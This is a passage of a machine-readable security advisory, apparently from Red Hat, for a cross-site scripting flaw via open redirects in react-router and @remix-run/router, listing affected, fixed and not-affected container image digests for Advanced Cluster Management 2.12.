"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:92c1123b4f6c4e89be7a0d9cd4adcafb9b97faebebd61dc24127661e45b61ec7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:b321bc989aede13694825dfa5ee6e6bf047e1d8da91a8fb83dc29cd0b27ab4ff_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:d41b061123db846fb27ddccffa7c57528326bcfa109f7d0a754e64aa16304b05_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:19ccb43f156361e14c8d69a6d832b60a63801fec502bd0f1632a264611c00a5c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:345bd79af661294f223be69961f96494da36e311906fb3a2e64b53677f65fd32_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:3cb2dd7e3a2cd4e2a46cde1f48dd72645c2c51e8bfc0eca8753cc851c726d29c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:c834685380ba00674a2835151ec9e4932457abefe6318748aba92cbe8443307d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:12c970f2005e943d674b35c711d2232f146bbbcf8e3807b3fb3c816b42e0cd8a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:dc231932eb7a2a9969fae5fb0e6f95594d71ddf6f957a2cb4751950ab8332510_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:e671767bca7b68bada15e2820d0df6adc49fbffcdb6c9708ee3a5346a919a1e4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:f64b875dcce5d957aaf198e2055a47f7faab441342aab6b2e055efe2d41c78b7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:0799283c1830e1aadd09976286eec671d0a86e44c155238279938b4f329f7157_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:7143a1a00eae582cff7671ab03464db03db48e89bd988ecc4851278922aeea29_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:9bac11bcf557740673e7168bb31fb6db8c5d92609094e5f1d1cb4c3ef6bc9603_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:ea03fd92669382846af5c8fa0b58f6858f123060d122f370d6af837f46d9d8aa_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:53a9844ffdd2d3f8cee8737722de91511cefdb4c65a7db614de6c4e070f70431_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:c603c06aa983d6b118e506bd2e6fba19f0cd26e379513c9c710ea517d2bc0d0f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:d9a867a6d289263f568b8940a9b970c8680061c1f26aebb9f8cc479956e9a030_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:f9e0a972cd08f77b71dd8b2217c57b98b36c5612ddfd6bb74704c378a03dd7e1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:1bda811b132cbc2220815d36983af98e0aafdcb4d30fa78f56bbd85ffc30a37c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:3bc66380cc46ef4bc18498a306535c11f0ba41a629bde92f9f6a35b8a8d11f89_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:c4f9eea72efd49d201456547b2a35abd6a194894e72c209bbe16763b86954639_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:d4b3934ecbd4882845770c313060dc76b588ffa3753f2b2ae0ec5f53ba868935_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:805d44ff7dcd6df5bd73cd58c0f410d8bdeac932d7c440b0c381517c3e1401ae_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:b3cbb2410596e3e0741f518ee3bbf8f6eebce0ea4a7ea4274a1e76f01692fe1e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:c6365357cdc1cd7b0adc4e1813f42d2c67501f770ee58e376e0c02096baca731_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:e3d8e0154fdaaa4e292949374fa637ec80827df473f2e3f8cc37425d98dc271b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:943de4b7c383fc679eac276a25ce6557336c95b92ebaa520bb74f8aee24115f5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:d448249f704e54f4316122fb3ad923295ffb5d6d2d16044803b56d1f8439de8f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:ee2ffe06e09f3694be474d69be61552d0e5a4dd7a25df89682aa59e4a10e02f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:f9dfff5ac57b47b580c733413ab3d10dec4d4d50589da894eb0a8278978459f9_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:5c90f0eddf6dbee5bdf11a6a818e4fbac22f6c8b2883728416dcc7aaeedd7362_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6528ed4780303fa09312c19f87c0f7d7109d91858473f73e6567e0fdde694b3f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6d1a86ffe09cbc6eba216db55800c21641e308dd1cee215972e0065136b9c612_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:fc6ea36b48ce47052d875988f378cad3ec9cec80189a605acdf1509f2beb52cf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:0caaa7f18df2105c9d6199343a70640dd6b558d7de55f2026f99b48d702c5afc_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:28cfe0893f17b70ff67f70cb7e471c8c724bf921b7a36c69ca2c43505bae635e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:7309f5d61a0fe99dfd8d523736afe2c8a709385e0eaaeaacfbda362fc7c2a16b_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:ccf06b51ce92c9f0fe9594b0082d0b09f77bb65b38ce08d5e02ac4f5a6fab2a4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:31153305711975b0bd5f780133699aeca52e96859363e85718c9047b26a32dbf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:55b2f0e54a6fdb3fb83f1af1f16524ebf36f0afb366f40fbbc8768cd4995ffb3_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:6be8bc17e09b099a79437f27ded3d563814e3c6702dd9ed698f5f17b9fb3afa2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:73c4ce25c2cc67fe3bec0cfc51e4c8b34929288f931f0f19c65bbbc969d0c588_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:128b74a18fb1fd1ba63f074d9d31e892a46048068608784f2696a4bbc7b57595_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:6b3fd2f8e3a164670dbbc59fd8c77057f98d97c0ba6ed7975711923e8acabb78_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:7c8de9466fee7334af1fef5647c4abaf9bd6b6012c301bb5c3c6a630cdc1dded_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:bbd945e3d0f92c8dfeb5601d7aa4d306f87e6facd9471a3c42f2582a264cd2ba_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:3aa3b11dfb3e0c9daba4818838a3a42e52ab81ecf27fb5fddd779746fd10d6d8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:8c19e6e38d755f35021ed1c57f3e69be65240df37539b72b8fe0d3f8ab050e36_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:a8f9a5a9f31cd903f23dfec9c832ed703d06882246aad25bd03e9512b633e5ca_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:e528d7996cda9185d5858a0edd8114b782d5627725d6e350fb087ba9f6270206_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:6a4fe92a913d7b778b8e756c618537c4a44aba7adc980355afcaf88b5cb871e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:b2563c07d52bd29574e0a896a2e72b90ff1144be31ec3dab9f89840be79936df_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:baacec8e68f6fcc0f4ee99f4405f80c560be369ec969a574534b01f43419a15d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:c7a24bf421728915b2e0cf3a7e803cbb18032959feab0cd2867b13f356136178_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:1f747a2fe3ee946ec3df5335c6527da41b84a92c1b7163e24b72809f958934a5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:699833b6f4ee8b8fdb45d5ed4a312972281576700a1a1d28dc0048d6c7188361_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:b807be4db3f323ac57c1464843c1b7dc1479b24ac89dadd070813da75f282375_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:d1c112f5dd97d3415030ab12eb93006c04070f70176e89e2555b071d4b1dc881_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:a20f72f80173be40bbd330de88bc94d32e7596bf1b0fd76dd895b739f2df1c2e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:d815d7688e0ad3e0d9b20a73f418282ac47eb0c6a2721db959374ff9b5756918_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:dd779a5f1de2fb5b61333ef7d11642a4e8cbfcb745f3f0a4318e336f6fe4e5b6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:f9e8be1fdc48039e3a46a09b9c1279d343a1fb48b987d0d2bdf7c4f0a720ca85_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:2fdcbd70cddfd8ef3d3211529434f24f69ff79fae57143e5ce66452a613b5c56_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:3d863c8706fca20261d46d0591ca2c18d34db98c5341136c840a80d0c285520c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:83eda40795e9b589114cddae252af2fc68ccf76b2a73522ad1094b2f84829be7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e94fb4d6c912c989e11532bd86fe3a2eab5b17329fb3b11362be651609863a50_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:030626d6ba921752acbc68159d7a6776318416c93cfc4360ef8e3c145e9ee635_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:0bdccbe184d904b58291858f01597286b2a0c45584f9af263714089911390f4c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:5fd8d966136617fd453431a649a6572ad640ca515b91c86b9a576c7b1e4fbd0e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:c6b267f6f0bb960032c380a0d978ebe3c8cd948f57a92ba9855c273fbd40a487_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2428412"
}
],
"notes": [
{
"category": "description",
"text": "A cross site scripting flaw has been discovered in the npm react-router and @remix-run/router packages. React Router (and Remix v1/v2) SPA open navigation redirects originating from loaders or actions in Framework Mode, Data Mode, or the unstable RSC modes can result in unsafe URLs causing unintended javascript execution on the client. This is only an issue if you are creating redirect paths from untrusted content or via an open redirect.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "@remix-run/router: react-router: React Router vulnerable to XSS via Open Redirects",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:0d6238ef864831d455a4a4b86d860469443079f6dcd26ce3b4fe546800565844_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:5c7378c5f1715490a88eaa2b791b4a643ee089f9b72ad4abfaf32d718f387fc8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:7e8f4c171a3081e428c168b506c544775876df772803e2cae4512d3c46b45354_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:8b0e5d09b887020a657b93953a63a788cf6dfc84200038be8417c2f9cd1df736_amd64"
],
"known_not_affected": [
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:20a379058f6e7b95ba010b0ceb936e124a67ad493975557c4bfe085948166b6e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7fb6e4b9729a300d9e82207ede660b52c2566fcdfb1f7174e5dd4cd59514afdf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:8a842f5c48c760be11d7df87fc2519bd9a68886bce7240aabea3e7a99c6bc172_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:fdcd8eff118d00b93f7a197c992bd5ddd1cce96b2b5cf3b542403dcbcc812691_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:59a7ad296b2023d6a633e2f7b99767e2c0c35ead31c8d92bdf233ff52522125d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:5a1fba286678b5d606a3ad553041cd68df207820c5f11685f7df0e94d04c27e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:60546ec2d4128da096811949b2609bdb9c7cb6205b36673ebe9d7b1ff868ea88_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:647b86bfc09d7eca6a7c3f7ee967ea60db1b90329600a0898f8f8b7bbdb204bf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:495889c3607c289f7265ef7bf18187686fedcbf8c382e86e8e98cdc31e8479d5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:519bd85630bb8c1eac29ca79a21a09e949fbe507e4186fe5d990c357517731a7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:b97cb625d22889517ef86b148ca4bfcc20e39bb887e0715ac37bd915cf45a83b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:d92337026de448a873fe66754e1ea837f7a650b4c8b1a057cbef1cceb6ae114a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:1ba9482f4a157a04b4b5cc212b7cbb98a323250969501698b230432a6ea545a5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:371bbcd62cb8e6c28cd3c1921e17c9067bc160433c4a6b14a1a2685a5f7d0519_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:922167d560484b217f772384cac0e9da48c31633ebf8984abf3ef99f5c31919b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:fd95f9c98201fc9e2deb2ce1af7598056e7e2bd61e2db42d195fa8acd4958f79_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:280e1dc73ea367d9c818086754ece9ea2d5a2c96496dcfea09844a7a55feb51d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:2d8b0b11cf907b25304501a2a62d5551c792c1fb3662ea4cd0e01db724a57b86_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:9abfdfd7491e219d7249800e05298472c4d545687fa7b6c79da71f9414f29d12_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:c11c8ba588a27d39f1b46bc6b63eebd8e9f9a822917a7638216c7fb93350aaf3_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:16710678f62e24a8877350bfdada7b8a533d4abad81984145e31614dc0e64d26_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:88c844cba042e1cd006c3ad413808ad10c4bdb95e8c0fc7b79cec3c3c40882b1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:d32bc1e886821ba104e8b2a5e16dc7b0aa1a01ea927e426ebd264298ac1d66f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:f09e16c30c4641612b2306cdbf56f85e31e03028d522597adf2e00f781148254_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:0dbdb9d02b41e437dd885741918114d8eea5bcdb1e97098b8e026adaf0cc70de_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:5a2014800be744b5034e754ad88cc82c29779c629cf2aa52068274aecd7b9d88_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:dc38a15065a73653097c85f6eb1b287a97498bc69dd86e7dbcd9efe6853255bb_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:f544c239f288daac99ca0018719000678f2e9f27b8303a5182fa01777c4c12f0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:0184923381940f806687d21a3422e16bee10b39b409fcecb50c940ed9b7e4d58_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:54390653fd89def95d9cba388cd37466ce709d843a9950b545091d9d9e14b4e4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:874f930ace72bd2771944e734432c322735b3bd91804019b211953070a308dd9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:d865a100823ff771c33e5e5799f16e1207158ab7519c6ac8a4daf53e1c4ae092_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:57fb017c2ba0f20880fc278689d37919ab95a88dffa0626d9a48050bef3b6fe3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:7d87a9cda623d527c5eaa08c5637422ed136339a9688edd5e8e9cc46f254beb3_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:b123eb6e855ec01a82e6ec2afa052eb344e2851b3d134514c53162012852d568_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:f12861597e8d62263d2ffa52b1fd19614a063605968999aeef33f444cfa82539_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:28ca07a0f4c2f02d47bfecae31110cbdc3284f1a7d688b559ed7d6305930ce81_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:713fafc87903d4284173e4b9690d0e3deba23d51ca0974106f0a76a450c38501_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:9a6847c058acd9d84d402506ac00576e0c437edb261c8e564605abab1b97428c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:c033acafe192f185dde20f032d399de7f4f9d25804ba96afe50e08eb1608a956_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:40cfab127e82cc6afc68b0642832e84ec45838db71d5500a42d87921ade70171_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:6dbefefd5b830cd9431559d7123d9643dca69e0cbbb58f5c5cc90f3d5e526c09_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:8262fa7a50560e0ac051f9ec158daceeb384acc92b1f98c0b7b73f5ec0451908_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:b2ee688170d432298a3eb7d0b057a01bcba26dfddfeabca7941f4bc3fc865141_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:0478cb24ab3df5826881b91dd0ea1b8152defdd04e38d0bc500a860a828716b0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:247872fe30c6d0bbb1098b6f189fd23aca2357122e591eb2bed3c79b0fe27055_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:b6a958526ae7d64016a110bd81ee38218bce014d52f10a6517a471bddfb93d45_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:ee89796a7ee9e6ab9cde9a5a450e16221bbdb74444188939c983d6d185bee08a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:243d75725446e0fe6be10ba04796c4db395f911470d1fd2575d35a3f1c82930c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:89f973ff38fcf35a484da1531bcf00db5e1d387a64a6dcbb25f19a5c26494584_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:a33b245208c9999546524f3bf971bb220418045dd799cebc43f0413823db0f8b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:ea918d66e2be8cc1411e048f3638afae348a44df36143621bcd3132718b33664_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:22b747e9952ede6b831297b64684acaafaf3e12998d6872081a08ae39b52c87b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:5d368764b9745d9a977bde3c4cd2faac1a344aea716ce626a0904b7da80f5267_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:8deed2b9ade0bc7ab30fd93d165fc1a8e18caab7b4af1d1b2b326dc93570c498_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:b68a3a1fe74bc4b319859874ca19a4e35c72174afc6a2af08e4bd7b64898d27f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:5f814b2ab34c4dcaedb7394d9f1ef9bd4d1bf6af934cd716ac44d1cfc43a6edf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:9acfa5180f02a68485cd1fc43e4794c7ffbac02c16942fabfbad9dd586c8ff74_amd64",
